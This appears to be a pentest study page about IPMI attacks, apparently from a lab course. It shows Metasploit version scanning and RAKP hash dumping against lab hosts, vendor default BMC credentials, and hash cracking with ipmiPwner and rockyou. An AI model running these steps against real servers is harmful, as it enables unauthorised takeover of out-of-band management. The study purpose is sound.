Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state.
msf6 > use auxiliary/scanner/ipmi/ipmi_version
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options
Module options (auxiliary/scanner/ipmi/ipmi_version):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS 10.129.42.195 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 623 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads
msf6 auxiliary(scanner/ipmi/ipmi_version) > run
[*] Sending IPMI requests to 10.129.42.195->10.129.42.195 (1 hosts)
[+] 10.129.42.195:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Default password
Product
Username
Password
Dell iDRAC
root
calvin
HP iLO
Administrator
randomized 8-character string consisting of numbers and uppercase letters
Supermicro IPMI
ADMIN
ADMIN
Metasploit Wordlists
ls /opt/tools/metasploit-framework/data/wordlists/ | grep ipmi
ipmi_passwords.txt
ipmi_users.txt
Get password
Metasploit Dumping Hashes
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt yes File containing common passwords for offline cracking, one per line
RHOSTS 10.129.42.195 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 623 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt yes File containing usernames, one per line
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
I don't know why but hashcat didn't find the password :(
ipmiPwner
Apr 06, 2024 - 05:26:05 (EDT) exegol-CPTS ipmiPwner # python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash
[*] Checking if port 623 for host 10.129.154.218 is active
[*] The username: admin is valid
[*] Saving hash for user: admin in file: "hash"
[*] The hash for user: admin
\_ $rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a
[*] Starting the hash cracking with python
[*] Reading the wordlist by chunks
[*] Chunk size: 1048576
[*] Reading Bytes: 139921497/139921497
[*] Hash Cracking Started
[+] Password Found, Cracked on line: [613]
[+] The password: trinity
[+] Time elapsed: 0.00254
[+] Result saved in: crackedHash
[Apr 06, 2024 - 05:26:58 (EDT)] exegol-CPTS ipmiPwner # cat crackedHash
$rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a:t*****y
Time elapsed: 0.00254
[Apr 06, 2024 - 05:27:19 (EDT)] exegol-CPTS ipmiPwner #
Resources
Interesting Books
Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.
The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.
